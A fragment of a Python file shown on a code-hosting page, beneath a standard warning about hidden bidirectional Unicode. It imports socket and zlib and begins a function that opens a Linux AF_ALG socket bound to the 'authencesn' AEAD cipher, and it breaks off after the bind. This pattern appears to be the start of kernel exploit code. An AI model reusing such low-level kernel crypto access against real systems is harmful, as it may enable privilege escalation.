This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import zlib | |
| import socket | |
| import tempfile | |
| NULL_BYTE = b'\x00' | |
| def decrypt_chunk(f, offset, chunk): | |
| a = socket.socket(38, 5, 0) | |
| a.bind(("aead","authencesn(hmac(sha256),cbc(aes))")) |